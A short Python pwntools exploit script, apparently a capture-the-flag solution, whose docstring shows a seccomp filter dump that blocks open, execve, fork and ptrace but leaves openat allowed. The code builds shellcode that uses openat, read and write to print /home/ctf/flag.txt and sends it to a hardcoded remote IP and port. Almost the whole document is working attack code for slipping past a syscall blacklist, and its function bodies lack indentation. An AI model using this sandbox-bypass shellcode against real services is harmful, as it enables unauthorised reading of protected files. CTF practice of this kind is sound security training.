```
#! /usr/bin/python3

"""
Using ./seccomp-tools dump ./filename
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x0b 0xc000003e if (A != ARCH_X86_64) goto 0013
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x08 0xffffffff if (A != 0xffffffff) goto 0013
0005: 0x15 0x07 0x00 0x00000002 if (A == open) goto 0013
0006: 0x15 0x06 0x00 0x00000038 if (A == clone) goto 0013
0007: 0x15 0x05 0x00 0x00000039 if (A == fork) goto 0013
0008: 0x15 0x04 0x00 0x0000003a if (A == vfork) goto 0013
0009: 0x15 0x03 0x00 0x0000003b if (A == execve) goto 0013
0010: 0x15 0x02 0x00 0x00000065 if (A == ptrace) goto 0013
0011: 0x15 0x01 0x00 0x00000142 if (A == execveat) goto 0013
0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0013: 0x06 0x00 0x00 0x00000000 return KILL

- We can see that some of the syscalls were blacklisted, but
openat() syscall was not blacklisted, therefore we can leverage that
for our advantage.
- Openat() requires the full path of the file as its argument and the
code is as follows.
"""

from pwn import *

context.clear(arch="amd64")

# generate shellcode using openat() minimum fd returned is (3)

shellcode = shellcraft.linux.openat(-1, "/home/ctf/flag.txt")
shellcode += shellcraft.linux.read(3, 'rsp', 80)
shellcode += shellcraft.linux.write(1, 'rsp', 80)

def main():
io = remote("20.216.39.14", 1236)
io.sendline(asm(shellcode))
io.interactive()

if __name__ == "__main__":
main()

```